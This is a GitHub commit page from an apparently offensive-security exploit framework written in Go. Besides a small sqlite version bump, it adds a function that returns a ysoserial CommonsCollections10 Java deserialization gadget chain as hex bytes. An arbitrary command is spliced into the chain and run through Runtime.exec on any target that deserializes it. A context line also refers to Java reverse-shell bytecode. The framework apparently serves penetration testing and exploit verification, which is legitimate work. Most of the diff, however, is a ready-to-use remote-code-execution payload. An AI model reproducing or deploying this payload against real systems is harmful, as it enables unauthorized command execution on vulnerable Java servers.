Skip to content

Commit 5dc1508

Browse files
lobsterjerusalemlobsterjerusalem
committed
Added java deserialization exploit from CommonsCollections10
1 parent 2ddb259 commit 5dc1508

File tree

3 files changed

+293
-3
lines changed

3 files changed

+293
-3
lines changed

go.mod

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@ require (
88
golang.org/x/crypto v0.36.0
99
golang.org/x/net v0.37.0
1010
golang.org/x/text v0.23.0
11-
modernc.org/sqlite v1.36.0
11+
modernc.org/sqlite v1.36.1
1212
)
1313

1414
require (

go.sum

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -50,8 +50,8 @@ modernc.org/opt v0.1.4 h1:2kNGMRiUjrp4LcaPuLY2PzUfqM/w9N23quVwhKt5Qm8=
5050
modernc.org/opt v0.1.4/go.mod h1:03fq9lsNfvkYSfxrfUhZCWPk1lm4cq4N+Bh//bEtgns=
5151
modernc.org/sortutil v1.2.1 h1:+xyoGf15mM3NMlPDnFqrteY07klSFxLElE2PVuWIJ7w=
5252
modernc.org/sortutil v1.2.1/go.mod h1:7ZI3a3REbai7gzCLcotuw9AC4VZVpYMjDzETGsSMqJE=
53-
modernc.org/sqlite v1.36.0 h1:EQXNRn4nIS+gfsKeUTymHIz1waxuv5BzU7558dHSfH8=
54-
modernc.org/sqlite v1.36.0/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
53+
modernc.org/sqlite v1.36.1 h1:bDa8BJUH4lg6EGkLbahKe/8QqoF8p9gArSc6fTqYhyQ=
54+
modernc.org/sqlite v1.36.1/go.mod h1:7MPwH7Z6bREicF9ZVUR78P1IKuxfZ8mRIDHD0iD+8TU=
5555
modernc.org/strutil v1.2.1 h1:UneZBkQA+DX2Rp35KcM69cSsNES9ly8mQWD71HKlOA0=
5656
modernc.org/strutil v1.2.1/go.mod h1:EHkiggD70koQxjVdSBM3JKM7k6L0FbGE5eymy9i3B9A=
5757
modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=

java/javaclass.go

Lines changed: 290 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,15 +1,305 @@
11
package java
22

33
import (
4+
"fmt"
45
"encoding/binary"
56
"strconv"
67
"strings"
8+
"errors"
79

810
"github.com/vulncheck-oss/go-exploit/config"
911
"github.com/vulncheck-oss/go-exploit/random"
1012
"github.com/vulncheck-oss/go-exploit/transform"
1113
)
1214

15+
var (
16+
errInvalidCommandLength = errors.New("invalid command length")
17+
)
18+
19+
func ErrorInvalidCommandLength(msg string) error {
20+
return fmt.Errorf("%w: %s", errInvalidCommandLength, msg)
21+
}
22+
23+
// Created using ysoserial with CommonsCollections10
24+
// It was created by allocating 255 space characters for the command
25+
// We just use what amount of that space we need for the command and put
26+
// the remaining spaces back after we're finished.
27+
// This does however mean that the commandStr has a length limitation of
28+
// the allocated space (255)
29+
func Commons11CommandBytecode(commandStr string) ([]byte, error) {
30+
if len(commandStr) > 255 {
31+
return []byte{}, ErrorInvalidCommandLength("command cannot be longer than 255 characters")
32+
}
33+
34+
if len(commandStr) <= 0 {
35+
return []byte{}, ErrorInvalidCommandLength("command must be greater than 0 characters")
36+
}
37+
38+
payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61"+
39+
"\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65"+
40+
"\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00"+
41+
"\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00"+
42+
"\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e"+
43+
"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
44+
"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
45+
"\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e"+
46+
"\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79"+
47+
"\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c"+
48+
"\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76"+
49+
"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
50+
"\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c"+
51+
"\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61"+
52+
"\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e"+
53+
"\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63"+
54+
"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74"+
55+
"\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e"+
56+
"\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74"+
57+
"\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac"+
58+
"\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64"+
59+
"\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e"+
60+
"\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64"+
61+
"\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f"+
62+
"\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06"+
63+
"\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a"+
64+
"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61"+
65+
"\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74"+
66+
"\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"+
67+
"\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f"+
68+
"\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72"+
69+
"\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61"+
70+
"\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72"+
71+
"\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff"+
72+
"\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd"+
73+
"\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00"+
74+
"\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17"+
75+
"\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00"+
76+
"\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39"+
77+
"\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07"+
78+
"\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56"+
79+
"\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01"+
80+
"\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74"+
81+
"\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd"+
82+
"\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01"+
83+
"\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65"+
84+
"\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65"+
85+
"\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63"+
86+
"\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61"+
87+
"\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00"+
88+
"\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65"+
89+
"\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49"+
90+
"\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01"+
91+
"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
92+
"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
93+
"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53"+
94+
"\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50"+
95+
"\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72"+
96+
"\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c"+
97+
"\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f"+
98+
"\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e"+
99+
"\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73"+
100+
"\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f"+
101+
"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
102+
"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
103+
"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
104+
"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
105+
"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
106+
"\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d"+
107+
"\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73"+
108+
"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
109+
"\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65"+
110+
"\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44"+
111+
"\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65"+
112+
"\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73"+
113+
"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
114+
"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
115+
"\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"+
116+
"\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74"+
117+
"\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01"+
118+
"\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73"+
119+
"\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f"+
120+
"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
121+
"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
122+
"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
123+
"\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e"+
124+
"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f"+
125+
"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c"+
126+
"\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73"+
127+
"\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f"+
128+
"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+
129+
"\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+
130+
"\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+
131+
"\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+
132+
"\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+
133+
"\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61"+
134+
"\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73"+
135+
"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+
136+
"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+
137+
"\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78"+
138+
"\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01"+
139+
"\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41"+
140+
"\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67"+
141+
"\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f"+
142+
"\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72"+
143+
"\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69"+
144+
"\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e"+
145+
"\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72"+
146+
"\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64"+
147+
"\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a"+
148+
"\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73"+
149+
"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
150+
"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
151+
"\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e"+
152+
"\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01"+
153+
"\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72"+
154+
"\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c"+
155+
"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f"+
156+
"\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d"+
157+
"\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72"+
158+
"\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76"+
159+
"\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69"+
160+
"\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f"+
161+
"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+
162+
"\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+
163+
"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+
164+
"\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65"+
165+
"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73"+
166+
"\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+
167+
"\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+
168+
"\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69"+
169+
"\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61"+
170+
"\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00"+
171+
"\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69"+
172+
"\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61"+
173+
"\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d"+
174+
"\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e"+
175+
176+
// 255 characters were allocated, we just put back the unused
177+
// length as spaces
178+
"\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) +
179+
180+
"\x08\x00\x30\x01\x00\x04"+
181+
"\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76"+
182+
"\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e"+
183+
"\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e"+
184+
"\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00"+
185+
"\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53"+
186+
"\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65"+
187+
"\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
188+
"\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30"+
189+
"\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c"+
190+
"\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77"+
191+
"\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32"+
192+
"\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03"+
193+
"\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06"+
194+
"\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04"+
195+
"\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00"+
196+
"\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7"+
197+
"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
198+
"\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00"+
199+
"\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00"+
200+
"\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00"+
201+
"\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1"+
202+
"\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01"+
203+
"\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03"+
204+
"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00"+
205+
"\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01"+
206+
"\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04"+
207+
"\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02"+
208+
"\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00"+
209+
"\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+
210+
"\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00"+
211+
"\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00"+
212+
"\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00"+
213+
"\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00"+
214+
"\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00"+
215+
"\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00"+
216+
"\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00"+
217+
"\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12"+
218+
"\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36"+
219+
"\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00"+
220+
"\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00"+
221+
"\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00"+
222+
"\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00"+
223+
"\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00"+
224+
"\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65"+
225+
"\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55"+
226+
"\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e"+
227+
"\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71"+
228+
"\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69"+
229+
"\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00"+
230+
"\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65"+
231+
"\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01"+
232+
"\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61"+
233+
"\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74"+
234+
"\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c"+
235+
"\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73"+
236+
"\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61"+
237+
"\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75"+
238+
"\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24"+
239+
"\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63"+
240+
"\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67"+
241+
"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00"+
242+
"\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65"+
243+
"\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64"+
244+
"\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65"+
245+
"\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76"+
246+
"\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+
247+
"\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f"+
248+
"\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65"+
249+
"\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+
250+
"\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+
251+
"\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21"+
252+
"\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a"+
253+
"\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02"+
254+
"\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01"+
255+
"\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00"+
256+
"\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00"+
257+
"\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00"+
258+
"\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00"+
259+
"\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00"+
260+
"\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00"+
261+
"\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50"+
262+
"\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a"+
263+
"\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63"+
264+
"\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65"+
265+
"\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c"+
266+
"\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79"+
267+
"\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74"+
268+
"\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61"+
269+
"\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e"+
270+
"\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"+
271+
"\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65"+
272+
"\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e"+
273+
"\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+
274+
"\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+
275+
"\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e"+
276+
"\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73"+
277+
"\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c"+
278+
"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67"+
279+
"\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c"+
280+
"\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c"+
281+
"\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d"+
282+
"\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61"+
283+
"\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00"+
284+
"\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76"+
285+
"\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63"+
286+
"\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00"+
287+
"\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65"+
288+
"\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72"+
289+
"\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"+
290+
"\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16"+
291+
"\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00"+
292+
"\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e"+
293+
"\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70"+
294+
"\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46"+
295+
"\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72"+
296+
"\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64"+
297+
"\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08"+
298+
"\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"
299+
300+
return []byte(payloadBytes), nil
301+
}
302+
13303
// This is the Java bytecode for a reverse shell. You can find the source code here:
14304
//
15305
// https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508

0 commit comments

Comments
 (0)